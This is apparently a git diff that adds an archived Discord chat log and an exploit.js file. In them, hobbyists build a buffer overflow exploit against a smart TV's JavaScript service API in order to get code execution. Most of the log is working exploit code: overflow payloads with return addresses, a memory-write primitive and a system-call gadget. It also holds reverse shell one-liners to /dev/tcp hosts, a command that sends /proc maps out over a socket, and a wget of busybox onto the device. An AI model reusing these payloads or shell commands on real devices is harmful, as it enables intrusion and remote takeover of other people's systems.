AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+>     "     >/tmp/b" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
+> )
+> ```  
+> @Emily | Sunpy#5213 
+
+> File: `exploit.js` (1.72 KB)  
+> this is the general idea  
+> but I wouldn't run this whole thing at first  
+> if/when you wanna mess with this mention me and I'll jump into voice  
+> @Jan4V#0289 
+
+> ``/dev/shm/shm_tmp/fusion.0.1``  
+> @Jan4V#0289 
+
+> File: `crashdump` (6.03 MB)  
+> @Emily | Sunpy#5213 
+
+> File: `crashdump` (181.60 KB)  
+> @Emily | Sunpy#5213 
+
+> ```js
+> function executeShellcode(shellcode) {
+>     var payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
+>     payload += encodeInt(0x41414141);
+>     payload += encodeInt(0x42424242);
+>     payload += encodeInt(0x9EBA0404);
+>     for(let i = 0; i < 4194304; i++)
+>     {
+>         payload += encodeInt(0xE0A15005);
+>     }
+>     payload += shellcode;
+>     new TV_JSP().tvServices.AmbiGet(0, payload);
+> }
+> ```  
+> @Jan4V#0289 
+
+> http://shell-storm.org/blog/Shellcode-On-ARM-Architecture/  
+> @Emily | Sunpy#5213 
+
+> http://shell-storm.org/shellcode/files/shellcode-730.php  
+> @Jan4V#0289 
+
+> btw `"a".repeat(123)` is a thing  
+> @HoLLy#2750 
+
+> ```js
+> function executeShellcode(shellcode) {
+>     var payload = "A".repeat(1036);
+>     payload += encodeInt(0x41414141);
+>     payload += encodeInt(0x42424242);
+>     payload += encodeInt(0x9EBA0404);
+>     for(let i = 0; i < 0x400000; i++)
+>     {
+>         payload += encodeInt(0xE0A15005);
+>     }
+>     payload += shellcode;
+>     new TV_JSP().tvServices.AmbiGet(0, payload);
+> }
+> 
+> executeShellcode(encodeInt(0xEF91337B));
+> ```  
+> @Jan4V#0289 
+
+> File: `crashdump` (124.31 KB)  
+> @Emily | Sunpy#5213 
+
+> 
+> ```js
+> function encodeInt(input) {
+>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
+> }
+> function executeCommand(command) {
+>     var payload = "A"*1036;
+>     payload += encodeInt(0x01011D48);
+>     payload += encodeInt(0x42424242);
+>     payload += encodeInt(0x9EBA0404);
+>     for(let i = 0; i < 0x400000; i++)
+>     {
+>         payload += encodeInt(0xE0A15005);
+>     }
+>     payload += encodeInt(0xE2444401);
+>     payload += encodeInt(0xE1A0B004);
+>     payload += encodeInt(0xE28F4008);
+>     payload += encodeInt(0xE1A0F00B);
+>     payload += encodeInt(0x41414141);
+>     payload += encodeInt(0x42424242);
+>     payload += command;
+>     new TV_JSP().tvServices.AmbiGet(0, payload);
+> }
+> 
+> executeCommand("touch /tmp/jan4v.txt");
+> ```  
+> @Jan4V#0289 
+
+> File: `crashdump` (124.31 KB) (DUPLICATE: No crashdump was generated and I did not pay attention to timestamp)  
+> @Emily | Sunpy#5213 
+
+> ``/dev/shm/shm_tmp/fusion.0.1``  
+> @Jan4V#0289 
+
+> File: `crashdump` (6.03 MB)  
+> @Emily | Sunpy#5213 
+
+> File: `crashdump` (167.34 KB)  
+> @Emily | Sunpy#5213 
+
+> ```js
+> function encodeInt(input) {
+>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
+> }
+> 
+> function execute(pc, r4, r11) {
+>     var payload = "A".repeat(1040);
+>     payload += encodeInt(r4);
+>     payload += encodeInt(r11);
+>     payload += encodeInt(pc);
+>     new TV_JSP().tvServices.AmbiGet(0, payload);
+> }
+> 
+> function writeMemory4(address, data)
+> {
+>     execute(0x23BCC, address + 0x880, data);
+> }
+> 
+> function callSystem(address)
+> {
+>     execute(0x11D48, address, 0x41414141);    
+> }
+> 
+> writeMemory4(0x8a55f040, 0x7478742E);
+> ```  
+> @Jan4V#0289 
+
+> I mean you could already pwn the browser  
+> I believe  
+> so you could make it display any web page  
+> and we can read/write a bunch of files on the fs  
+> but sunpy is too scared to overwrite a script and get a shell that way, so we're doing the obviously safer way of corrupting the stack and jumping to the middle of a function, in the hope we can run a shell command that way :^)  
+> @HoLLy#2750 
+
+> We couldn't overwrite the scripts though  
+> @Shaddy#4422 
+
+> when I say "we" I basically mean an  
+> we tried like 1 script lol  
+> @HoLLy#2750 
+
+> we dont have permissions to write to the file  
+> we only have permissions to tmp  
+> @Emily | Sunpy#5213 
+
+> there's multiple places that get executed  
+> probably more places too though  
+> @HoLLy#2750 
+
+> We've tried multiple places  
+> @Shaddy#4422 
+
+> if there's a file/folder with incorrect permissions  
+> @HoLLy#2750 
+
+> That's the less exciting exploit anyway :^)  
+> @Shaddy#4422 
+
+> I tried to look for a script that *may* be in tmp that gets executed as the people doesnt seem to be consistent  
+> but couldnt find any  
+> we have permissions to /3rd_rw aswell  
+> @Emily | Sunpy#5213 
+
+> im going to jump out the window  
+> we can write commands to an ini file in read/write area  
+> @Emily | Sunpy#5213 
+
+> ``bash -i >& /dev/tcp/10.0.0.1/4242 0>&1``  
+> @Jan4V#0289 
+
+> @Emily | Sunpy#5213 `( sleep 300 ; echo "80" > /sys/class/leds/blue/brightness ) &`  
+> @HoLLy#2750 
+
+> https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/  
+> http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet  
+> @HoLLy#2750 
+
+> `( sleep 6 ; bash -i >& /dev/tcp/192.168.2.134/4242 0>&1 ) &`  
+> @Emily | Sunpy#5213 
+
+> ``( sleep 30; cat /proc/*/maps > /dev/tcp/127.0.0.1/4242; ) &``  
+> @Jan4V#0289 
+
+> File: `crashdump` (268.85 KB)  
+> @Emily | Sunpy#5213 
+
+> ![Terminal-tmux](img/img0.png "img0")  
+> @HoLLy#2750 
+
+> ```js
+> function encodeInt(input) {
+>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
+> }
+> 
+> function execute(pc, r4, r11) {
+>     var payload = "A".repeat(1040);
+>     payload += encodeInt(r4);
+>     payload += encodeInt(r11);
+>     payload += encodeInt(pc);
+>     new TV_JSP().tvServices.AmbiGet(0, payload);
+> }
+> 
+> function callSystem(address)
+> {
+>     execute(0x11D48, address, 0x41414141);    
+> }
+> 
+> callSystem(0x9CF55588);
+> ```  
+> @Jan4V#0289 
+
+> ![cmd - nc -nlvp 1337](img/img1.png "img1")  
+> @Emily | Sunpy#5213 
+
+> ``/3rd/bin/wget https://busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-armv7l``  
+> ![openbox commands](img/img2.png "img2")  
+> @Jan4V#0289 
+
+> ``mount -t devpts none /dev/pts``  
+> @Jan4V#0289 
+
+> ![terminal](img/img3.png "img3")  
+> @Emily | Sunpy#5213 
+
+> https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32hf.tar.gz  
+> @Jan4V#0289 
+
+> https://betacraft.pl/server-archive/minecraft/  
+> @Jan4V#0289 
+
+> https://download.cuberite.org/linux-armhf-raspbian/Cuberite.tar.gz  
+> @Jan4V#0289 
+
+> ``LD_LIBRARY_PATH=/lib:/3rd_rw/server``  
+> https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32sf.tar.gz  
+> @Jan4V#0289 
+
+> ![minecraft server start](img/img4.png "img4")  
+> ![minecraft server still starting](img/img5.png "img5")  
+> @Emily | Sunpy#5213 
+
+> 569043771063ns loadtime :D  
+> @Emily | Sunpy#5213 
+
+> ![minecraft server running](img/img6.png "img6")  
+> @Emily | Sunpy#5213 
+
+> ```
+> AllowTcpForwarding remote  
+> AllowStreamLocalForwarding no  
+> GatewayPorts yes  
+> ```  
+> @Jan4V#0289 
+
+> > minecraft code execution  
+> > \- Holly  
+> @Emily | Sunpy#5213 
+

files/28_apr_2020/files/exploit.js

@@ -0,0 +1,30 @@
+function encodeInt(input) {
+	return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
+}
+
+function execute(pc, r4, r11) {
+	var payload = "A".repeat(1040);
+	payload += encodeInt(r4);
+	payload += encodeInt(r11);
+	payload += encodeInt(pc);
+	new TV_JSP().tvServices.AmbiGet(0, payload);
+}
+
+function writeMemory4(address, data)
+{
+	execute(0x23BCC, address + 0x880, data);
+}
+
+function callSystem(address)
+{
+	execute(0x11D48, address, 0x41414141);	
+}
+
+writeMemory4(0x40383FFB, 0x7478742E);
+writeMemory4(0x40383FF7, 0x76346E61);
+writeMemory4(0x40383FF3, 0x6A2F706D);
+writeMemory4(0x40383FEF, 0x742F2068);
+writeMemory4(0x40383FEB, 0x63756F74);
+callSystem(0x40383FEB);
+
+// Does not work